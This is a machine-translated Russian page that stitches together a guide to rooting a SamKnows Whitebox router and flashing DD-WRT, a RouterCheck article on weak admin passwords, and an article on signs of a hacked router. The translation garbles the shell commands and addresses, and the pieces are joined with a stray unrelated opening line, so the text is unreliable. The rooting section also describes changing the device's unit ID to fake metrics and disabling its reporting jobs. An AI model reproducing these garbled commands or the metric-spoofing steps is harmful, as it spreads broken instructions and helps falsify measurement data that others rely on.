На самом деле, это, вероятно, последнее, о чем вы думаете, даже если вы изрядно увлечены своим компьютером и сетевым оборудованием (как я).Чтобы исправить это, оставьте напоминание в своем любимом инструменте планирования, чтобы через три месяца повторно посетить страницу поддержки производителя маршрутизатора, чтобы проверить наличие обновлений, и установите другое напоминание в этот момент на любой период времени, который вам кажется подходящим.
hacking-the-whitebox.md · GitHub
SamKnows Whitebox — это бесплатный маршрутизатор (TP-Link TL-WDR3600), предоставляемый SamKnows для сбора статистики скорости интернета. Хорошо, это здорово, но любой человек с небольшим хакерским духом захочет взломать его, чтобы установить некоторую кастомную прошивку, чтобы воспользоваться двумя гигантскими антеннами на задней панели, портами USB и всем остальным.
Шаг 1. Режим отладки
Root-доступ может быть получен через «режим отладки» на маршрутизаторе, что дает вам прямую корневую оболочку через telnet, что удивительно просто.
- Отключите Whitebox от Интернета.
- Подключите ваш компьютер напрямую к Whitebox через Ethernet к одному из четырех портов Ethernet на Whitebox.
- Настройте параметры IP вашего компьютера на «Вручную», установив IP-адрес компьютера на
192.168.1.2
, маску подсети на255.255.255.0
и шлюз к192.168.1.1
. - Выключите Белый ящик.
- Включите Белый ящик.
- Подождите, пока все индикаторы не загорятся и не погаснут, затем спамите кнопку «WPS / Reset» на задней панели Whitebox.
- Продолжайте рассылать спам, пока второй светодиод слева не начнет непрерывно мигать. Теперь вы находитесь в «режиме отладки».
Шаг 2. Изменение пароля root
Хорошо, теперь у вас есть корневая оболочка на Whitebox через telnet, не так уж и сложно.] ‘. === ВАЖНО ============================ Используйте passwd, чтобы установить пароль для входа. это отключит telnet и включит SSH —————————————— BusyBox v1.19.4 (2012-11-21 13:26:44 GMT) встроенная оболочка (ясень) Введите «help» для получения списка встроенных команд. _ ___ __ _ _ __ ___ | | ___ __ _____ _____ / __ | / _` | ‘_ `_ \ | | / / ‘_ \ / _ \ \ / \ / / __ | \ __ \ (_ | | | | | | | <| | | | (_) \ V V / \ __ \ | ___ / \ __, _ | _ | | _ | | _ | _ | \ _ \ _ | | _ | \ ___ / \ _ / \ _ / | ___ / МОНИТОРИНГ ПРОИЗВОДИТЕЛЬНОСТИ ОС: OpenWRT Attitude Adjustment, r35093 ПО: сборка WDR3600 ------------------------------------------------- корень @ (нет): / #
Вот и все, корневая оболочка busybox.Далее … монтируем файловую систему:
корень @ (нет): / # mount_root
переход на jffs2
Теперь мы можем вносить изменения в систему, например, мы могли бы изменить пароль … пользователя root, возможно (они намекнули при подключении через telnet)
корень @ (нет): / # пароль
Смена пароля для root
Новый пароль:
Неверный пароль: слишком короткий
Повторите ввод пароля:
Пароль для root изменен root
Я установил пароль на «root», отсюда и предупреждение «Неверный пароль».
Шаг 3: SSH внутри
Telnet — это куча дерьма, рекомендуется переход на SSH.
Теперь, если вы перезапустите коробку (не пытайтесь перезагрузить
, это не так много, просто вытащите вилку), снова подключите Whitebox к маршрутизатору, тогда вы сможете получить доступ к устройству через SSH на порту. 2222 (как только вы найдете IP-адрес, назначенный DHCP, проверьте веб-интерфейс вашего маршрутизатора, чтобы узнать, можете ли вы получить список всех подключенных устройств, или попробуйте сканирование IP-адресов в локальной сети)
$ ssh root @ 10.0,0.44 -p 2222
пароль [email protected]:
BusyBox v1.19.4 (2012-11-21 13:26:44 GMT) встроенная оболочка (ясень)
Введите «help» для получения списка встроенных команд.
_
___ __ _ _ __ ___ | | ___ __ _____ _____
/ __ | / _` | '_ `_ \ | | / / '_ \ / _ \ \ / \ / / __ |
\ __ \ (_ | | | | | | | <| | | | (_) \ V V / \ __ \
| ___ / \ __, _ | _ | | _ | | _ | _ | \ _ \ _ | | _ | \ ___ / \ _ / \ _ / | ___ /
МОНИТОРИНГ ПРОИЗВОДИТЕЛЬНОСТИ
ОС: OpenWRT Attitude Adjustment, r35093
ПО: сборка WDR3600
корень @ OpenWrt: ~ #
Шаг 4. Изучите
Теперь вы внутри, вы можете исследовать окрестности, найти «Unit ID» вашего устройства, чтобы подделать метрики:
корень @ OpenWrt: / tmp / samknows # cat / tmp / samknows / unitid
123456
Вы также можете изменить его, чтобы представить, что вы кто-то другой (Предупреждение: "unitid" возвращается к значению по умолчанию при перезагрузке) с быстрым vi / tmp / samknows / unitid
Вы также можете узнать, как все работает (например, отправлять результаты и все разные тесты) и отключить отчеты, исследуя / tmp / ispmon
корень @ OpenWrt: ~ # cat / tmp / ispmon / cron / crontab
40 * * * * / tmp / ispmon / bin / dcsclient https: // dcs-uk.samknows.com:443 -v> / dev / null 2> & 1
45 * * * * / tmp / ispmon / scripts / pcscript> / dev / null 2> & 1
25 * * * * /tmp/ispmon/scripts/sanity.sh> / dev / null 2> & 1
26 * * * * /tmp/ispmon/scripts/submit.sh> / dev / null 2> & 1
30 * * * * /tmp/ispmon/scripts/timesync.sh> / dev / null 2> & 1
35 6 * * * /usr/sbin/udhcpcrestart.sh> / dev / null 2> & 1
38 22 * * * /tmp/ispmon/scripts/background_tests.sh перезапуск> / dev / null 2> & 1
Показывает, какие скрипты вызываются системой и как часто.Тот же вывод можно получить с помощью crontab -e
Выполнение Cronjob можно отключить для текущего сеанса с помощью killall crond
И если вы хотите отключить что-то навсегда, взгляните на / оверлей
(хорошее объяснение доступно здесь)
Шаг 4.2: Резервное копирование
Благодаря @nonflammable за это, если вы когда-нибудь захотите вернуться к исходной прошивке Samknow, вы можете сделать следующее, если не игнорировать этот шаг.
Сделайте быстрое резервное копирование системы:
dd if = / dev / mtdblock5 of = / tmp / sysbackup.bin
Скопируйте файл /tmp/sysbackup.bin
в относительно безопасное место на вашем компьютере с помощью чего-нибудь вроде WinSCP или Filezilla.
Всякий раз, когда вам нужно восстановить резервную копию, вы можете использовать следующую команду:
mtd -r запись /tmp/sysbackup.bin прошивка
Или вы также можете использовать веб-интерфейс DD-WRT для загрузки и прошивки sysbackup.bin
без командной строки 1337.
Самое замечательное в этом маленьком белом ящике то, что мы можем установить на него практически все, что я выбрал для установки DD-WRT. Для начала вам нужно найти правильную прошивку для Whitebox и загрузить ее на свой компьютер.
Откройте базу данных маршрутизатора DD-WRT, введите TL-WDR3600
и загрузите файл factory-to-ddwrt.bin
.
Поместите файл на веб-сервер на вашем компьютере, чтобы сделать его доступным из белого ящика, чтобы маршрутизатор мог получить доступ к http: // 192.168.1.2 / factory-to-ddwrt.bin
- Теперь вернитесь к шагу 1 и войдите в Белый ящик через telnet.
- Выполните команду
mount_root
. - Перейти в каталог
/ tmp
:cd / tmp
- Выполнить
wget http://192.168.1.2/factory-to-ddwrt.bin
- Выполнить
mtd -r write /tmp/factory-to-ddwrt.bin прошивка
Теперь у вас должен быть следующий результат, это может занять некоторое время, не паникуйте:
root @ (нет): / tmp # mtd -r запись / tmp / factory-to-ddwrt.bin прошивка
Разблокировка прошивки ...
Запись из /tmp/factory-to-ddwrt.bin в прошивку ...
Перезагрузка ...
Шаг 6. Наслаждайтесь
Теперь сеанс telnet должен умереть, и ваш Белый ящик должен перезагрузиться, я назову его теперь Черным ящиком, потому что он обращен на темную сторону.
Теперь, посетив http://192.168.1.1/ в своем браузере, вы увидите совершенно новую версию DD-WRT. Я не собираюсь подробно рассказывать о настройке, теперь это ваша проблема.Удачи со своим Blackbox!
TP-LINK / TL-WR840N: пароль
Примечание. Если вы не можете решить проблему после выполнения этих инструкций, возможно, мы сможем помочь. Получите помощь от службы поддержки RouterCheck.
Понимание проблемы «неверный пароль администратора»
Пароль администратора защищает ваш маршрутизатор от несанкционированного доступа к его функциям.Неправильно подобранный пароль позволяет хакерам по всему миру взломать ваш маршрутизатор и домашнюю сеть. Взломанные маршрутизаторы подвергают все домашние компьютеры дальнейшим атакам, что подвергает риску ваши конфиденциальные данные.
К сожалению, многие люди никогда не меняют пароль администратора своего маршрутизатора по умолчанию, что упрощает взлом хакеров. Есть даже веб-сайты, на которых вы можете найти пароль по умолчанию для любой модели маршрутизатора.Вот почему так важно использовать надежный пароль.
Если RouterCheck определил, что у вас неверный пароль администратора, это означает, что либо вы не изменили пароль по умолчанию, либо выбрали очень распространенный пароль, который легко угадать. В любом случае мы рекомендуем немедленно изменить пароль.
Каков риск не решить эту проблему?
Плохо подобранный пароль маршрутизатора всегда вызывает серьезную озабоченность.Многие люди испытывают ложное чувство безопасности, потому что считают, что их домашняя сеть недоступна хакерам через Интернет. Хотя это может быть правдой, это, конечно, не означает, что пароль администратора вашего маршрутизатора не подлежит атаке.
Хакеры обычно используют вирусы на компьютерах в домашней сети, чтобы попытаться проникнуть в маршрутизатор этой сети. Они также могут использовать атаку CSRF (подделка межсайтовых запросов), которая использует зараженные веб-страницы, чтобы воспользоваться некоторыми уязвимостями маршрутизатора.Суть в том, что пароль администратора вашего маршрутизатора очень важен, и его не следует устанавливать по умолчанию или легко угадываемое значение.
Документация поставщика
Часто бывает полезно просмотреть документацию маршрутизатора, чтобы узнать, как исправить проблемы. Перейдите на сайт поддержки поставщика, где вы можете загрузить документацию.
Как решить проблему "неверный пароль администратора"
Шаг 1. Войдите в свой роутер.
Вы используете веб-браузер для взаимодействия с маршрутизатором и устранения проблем с его конфигурацией. Однако, прежде чем вы сможете взаимодействовать с вашим браузером, вы должны войти в него. RouterCheck может дать вам подробные инструкции по входу в ваш роутер.
Шаг 2: Если вы успешно авторизуетесь, откроется домашняя страница вашего роутера.
Шаг 3: перейдите на страницу администратора.
Найдите страницу с настройками администратора. Название страницы может быть похоже на:
- Администратор
- Администрация
- Настройки администратора
Перейдите на эту страницу, щелкнув соответствующие элементы меню и кнопки.
Шаг 4: В случае успеха откроется страница администратора вашего маршрутизатора.
Шаг 5: Выберите новый пароль.
Выбор нового пароля - очень важный шаг. Он защищает ваш маршрутизатор и домашнюю сеть от злоумышленников.
Не используйте общий пароль, такой как «пароль» или «qwerty».Выберите что-нибудь необычное, но все же запоминающееся. От этого зависит безопасность вашей сети.
Шаг 6: Измените пароль.
Шаг 1. Найдите место для ввода нового пароля - например, поле под названием «Новый пароль».
Шаг 2: При необходимости введите тот же пароль в другое поле под названием «Повторите новый пароль».
Шаг 3: Нажмите кнопку «Применить».
Шаг 7: запомните свой новый пароль.
Важной частью установки пароля является его запоминание. Маршрутизатор - это не типичный веб-сайт, который сбрасывает ваш пароль или отправляет вам подсказки, если вы его забудете. Если вы забыли пароль администратора маршрутизатора, единственный способ получить доступ к маршрутизатору - сбросить настройки маршрутизатора до заводских настроек по умолчанию.Это позволяет вам вернуться в маршрутизатор, но при этом перезаписываются все настройки маршрутизатора (например, настройка безопасности Wi-Fi). Вы должны повторить эти настройки.
При необходимости вы можете записать пароль вашего роутера. Тем не мение:
- Держите записанное подальше от посторонних глаз.
- Помните, где вы это записали! Запись чего-либо не поможет, если вы не можете найти, куда это положили.
Кроме того, вы можете сохранить свой пароль в диспетчере паролей. Менеджер паролей не только может помочь вам, создав пароль для вас, но и надежно сохранит пароль для вас, и вам не придется искать этот клочок бумаги. И, по всей вероятности, ваш менеджер паролей войдет на вашу страницу администратора WiFi за вас. Если вы планируете использовать менеджер паролей, мы рекомендуем использовать Sticky Password.
Шаг 8: повторно запустите RouterCheck.
Теперь, когда вы устранили проблему, снова запустите RouterCheck, чтобы убедиться, что вы действительно устранили проблему.
Как узнать, взломали ли кто-то ваш маршрутизатор и как это исправить
Убедитесь, что вы знаете, что делать, если ваша сеть взломана через маршрутизатор, и шаги, которые вы можете предпринять, чтобы решить эту проблему!
Не знаете, как узнать, взломал ли кто-то ваш роутер? Мы расскажем о некоторых типичных признаках «взломан роутер» и расскажем, как исправить взломанный роутер.Но сначала давайте рассмотрим, что такое маршрутизатор и какую роль он играет в вашем онлайн-мире.
Маршрутизаторыпохожи на указатели в Интернете - они направляют трафик по правильному пути. Подобно указателям с перекрестками улиц, маршрутизаторы размещаются между двумя или более частями Интернета. Итак, когда вы подключаетесь к «Wi-Fi» или «Интернету», на самом деле вы подключаетесь к маршрутизатору:
Пример скриншота беспроводной сети, к которой может подключиться ваш маршрутизатор.Все, что любое устройство в вашем доме делает «в Интернете», передается через ваш маршрутизатор. Итак, если хакер берет под свой контроль ваш маршрутизатор, он теоретически может видеть и / или контролировать все, что вы делаете в Интернете.
Маршрутизатор жизненно важен для правильной работы домашней сети и обработки конфиденциальных данных. Меньше всего вам хотелось бы, чтобы его взломали! Вот почему так важно знать, как узнать, взломал ли кто-то ваш маршрутизатор, и как исправить взломанный маршрутизатор.
Как взламывают маршрутизаторы?
Прежде чем мы углубимся в особенности знаков взлома маршрутизаторов, давайте рассмотрим, как именно маршрутизаторы взламываются.Ваш роутер можно взломать любым количеством способов. Двумя наиболее распространенными являются следующие:
Вы включили удаленное управление
Существует так называемое удаленное управление. Если вы включили удаленное управление, это означает, что вы можете получить доступ к своему маршрутизатору из удаленного места, подключившись через Интернет. Если удаленное управление включено, это может быть возможностью для хакера получить контроль над вашим маршрутизатором (подробнее об этом позже).
В вашей сети есть уязвимости
Уязвимости, такие как использование слабых паролей и наличие устаревшего программного обеспечения в прошивке маршрутизатора, могут быть еще одним способом для хакера получить контроль над вашим маршрутизатором.
В отчете Avast Threat Landscape 2019 Predictions Report исследование Avast показывает, что в 2018 году «60% пользователей во всем мире никогда не обновляли прошивку своих маршрутизаторов, что делает их потенциально уязвимыми для довольно простых атак, использующих уязвимости прошивки». Это говорит о том, что большинство людей не знают, как защитить свои маршрутизаторы, или даже не подозревают, что могло бы случиться, если бы они этого не сделали.
Что может случиться, если ваш маршрутизатор взломан
Как только хакер берет под свой контроль ваш маршрутизатор, все может быстро стать некрасивым…
- Хакеры могут украсть ваши данные - Как только хакер оказывается внутри, у него в значительной степени есть свободный диапазон, чтобы украсть те данные, которые им нужны.Это могут быть пароли, электронные письма, сообщения в социальных сетях и любые другие личные данные, которые вы размещаете в Интернете.
- Вы можете стать целью перехвата DNS - Хакеры также могут выполнять так называемый перехват DNS, который представляет собой атаку DNS, которая включает перенаправление пользователей на веб-сайты, на которые они не собирались переходить. Обычное место, куда хакер перенаправляет пользователя, - это фишинговый веб-сайт, замаскированный под веб-сайт, на который они собирались перейти. Если хакер проникнет в ваш маршрутизатор, он может перезаписать ваши настройки DNS и отправить вас куда захотят.
- Вы можете оказаться в зоне действия вредоносных программ и DDoS-атак - Хакеры могут внедрить фрагменты вредоносного кода (вредоносное ПО), которые могут поставить под угрозу всю вашу домашнюю сеть, или использовать ваш маршрутизатор в DDoS-атаке (распределенный отказ в обслуживании) . Это когда хакер использует сеть взломанных устройств для наводнения своей цели (обычно другой сети или веб-сайта), что блокирует доступ пользователей к ней.
Взломанные роутеры - не шутка. Например, в 2018 году ФБР выдало предупреждение о вредоносном ПО VPNFilter.В сообщении говорится, что иностранные киберпреступники «использовали вредоносное ПО VPNFilter для нацеливания на маршрутизаторы в небольших и домашних офисах». Вредоносная программа способна выполнять несколько функций, включая возможный сбор информации, использование устройства и блокировку сетевого трафика ». ФБР также предполагает, что вредоносное ПО было нацелено на маршрутизаторы, произведенные несколькими производителями, и в результате «скомпрометировало сотни тысяч домашних и офисных маршрутизаторов».
Как узнать, взломали ли кто-то ваш маршрутизатор
Несмотря на все эти разговоры о том, насколько опасен взломанный маршрутизатор, я уверен, вы задаетесь вопросом, на какие признаки следует обращать внимание, чтобы узнать, взломан ли ваш маршрутизатор.Вот несколько «признаков взлома маршрутизатора», на которые следует обратить внимание:
Ваши учетные данные не работают
Пароли внезапно перестают работать - это плохой знак. То же самое и с вашим роутером. Если ваш пароль Wi-Fi или логин в интерфейсе администратора вашего маршрутизатора не работают, это может быть признаком того, что хакер проник в ваш маршрутизатор и изменил его, чтобы заблокировать вас.
Пример того, как может выглядеть страница входа в интерфейс администратора вашего маршрутизатора .Вы замечаете неизвестные IP-адреса в своей сети
Если вы вошли в интерфейс своего маршрутизатора, вам следует регулярно проверять список IP-адресов, используемых в вашей сети. Если вы видите неизвестный адрес (особенно иностранный), это, скорее всего, означает, что хакер получил доступ к вашему маршрутизатору. Итак, для нашего следующего метода, как определить, был ли ваш маршрутизатор взломан, проверьте наличие неизвестных IP-адресов.
Пример того, какую страницу следует посетить, чтобы проверить неизвестные IP-адреса.Просто обратите внимание, что эта страница может выглядеть по-разному в зависимости от типа или марки маршрутизатора, который вы используете.Вы перенаправлены на непредусмотренные или неизвестные веб-сайты
Возвращаясь к перехвату DNS и хакерам, перенаправляющим вас на опасные веб-сайты, о которых мы говорили минуту назад… это еще один признак взломанного маршрутизатора. Если вы пытаетесь посетить свой обычный раунд веб-сайтов, и вас постоянно перенаправляют на веб-сайты, которые вы не собирались посещать, это может быть признаком взломанного маршрутизатора с использованием перехвата DNS.
Вы получаете сообщения о программах-вымогателях
Хорошо, это последний пункт в нашем списке о том, как узнать, взломал ли кто-то ваш роутер. Программы-вымогатели - это тип вредоносного программного обеспечения, которое хакеры используют для прекращения доступа к вашим данным в обмен на вымогательство. Если хакер проник в ваш маршрутизатор, он может очень легко заблокировать доступ к вашей сети.
Но что вы будете делать, если получите электронное письмо или какой-либо другой вид связи от хакера с требованием оплаты в обмен на доступ к вашей сети? ФБР рекомендует не платить требование о выкупе и просит связаться с ближайшим к вам полевым отделением ФБР или сообщить об этом по подсказкам.fbi.gov.
Как исправить взломанный маршрутизатор за шесть простых шагов
Если вы заметили признаки взлома роутера, то наверняка захотите действовать быстро, чтобы исправить это. Вот шаги, которые вы должны предпринять, если считаете, что ваш роутер взломан.
Шаг 1. Отключитесь от Интернета
При отключении вашего маршрутизатора от Интернета хакер теряет возможность доступа к маршрутизатору, поскольку больше нет соединения.
Шаг 2. Сбросьте настройки маршрутизатора
Выполнив сброс настроек до заводских, ваш маршрутизатор сбросит ваши настройки и пароли.Это позволяет вам иметь дело с роутером с чистого листа. Прямо на маршрутизаторе должна быть кнопка физического сброса, которая поможет вам выполнить эту задачу.
Шаг 3. Измените пароли
После сброса настроек маршрутизатора войдите в интерфейс администратора маршрутизатора и сбросьте пароль. Обратите внимание, что при сбросе настроек маршрутизатора для вашей регистрационной информации будут восстановлены заводские настройки имени пользователя и пароля по умолчанию. На вашем маршрутизаторе должна быть наклейка с указанием учетных данных по умолчанию для справки.Кроме того, чтобы войти на страницу администратора вашего маршрутизатора, вы должны знать его IP-адрес.
Пример того, как может выглядеть страница интерфейса администратора вашего маршрутизатора.При сбросе пароля убедитесь, что используете уникальный, длинный и сложный пароль, который также легко запомнить, например такую фразу, как MyFavoriteEatery78910. Вам следует сбросить пароль для интерфейса администратора маршрутизатора и вашего домашнего Wi-Fi. Надеемся, что после выполнения этих первых трех шагов вы заблокируете хакера из своей сети.
Нужна помощь в создании надежного пароля? Вы можете проверить надежность любых создаваемых вами паролей с помощью такого инструмента, как проверка паролей security.org. Используя этот инструмент для проверки ключевой фразы «Mustard4Saltydogs», я получил следующий результат:
Снимок экрана с результатами исследования security.org «Насколько безопасен мой пароль?» орудие труда.Шаг 4 - Свяжитесь с правоохранительными органами (при необходимости)
Это восходит к ситуации с программами-вымогателями. Программы-вымогатели - серьезное преступление, и с ними нужно бороться соответствующим образом.Независимо от того, можете ли вы войти и изменить свои пароли после сброса или нет, вы должны сообщить о преступлении. Помимо сообщения о преступлении, ФБР также рекомендует перезагрузить роутер, сбросить пароль и выполнить следующие несколько шагов из списка…
Шаг 5. Обновите прошивку
Маршрутизаторыне всегда обновляются самостоятельно, поэтому важно обновлять прошивку вручную. Прошивка - это программное обеспечение, которое контролирует определенные аспекты оборудования вашего маршрутизатора. Обновления важны, поскольку они помогают исправлять уязвимости, которые могут стать основной целью для хакера, желающего вернуться в ваш маршрутизатор.
Шаг 6. Отключение удаленного управления
Удаленное управление позволяет получить доступ к вашей сети из удаленного места. Это довольно удобно, когда вы в отпуске или в путешествии, но эта функция также позволяет хакерам легко контролировать вашу сеть и компьютеры практически из любого места.
Если он включен и у хакера есть к нему доступ, это означает, что он может взять под контроль ваш рабочий стол и загружать, выгружать или делать практически все, что захотят. Выключи это!
Заключение о взломанных маршрутизаторах и решениях
Мы надеемся, что ответили на вопрос «как узнать, взломал ли кто-то ваш роутер?» Мы надеемся, что вам больше никогда не придется сталкиваться с проблемой взлома маршрутизатора, поскольку это может быть проблемой.Однако, если вы это сделаете, мы надеемся, что эти советы помогут вам справиться и удалить хакера из вашей сети.
По мере того, как вы двигаетесь вперед с более ориентированным на безопасность мышлением, есть еще несколько советов, которые вы должны реализовать, чтобы предотвратить получение хакером несанкционированного доступа в будущем:
- Регулярно меняйте пароль администратора роутера и пароли Wi-Fi.
- Постоянно обновляйте прошивку.
- Отслеживайте IP-адреса, указанные на странице администратора.
Ваш комментарий будет первым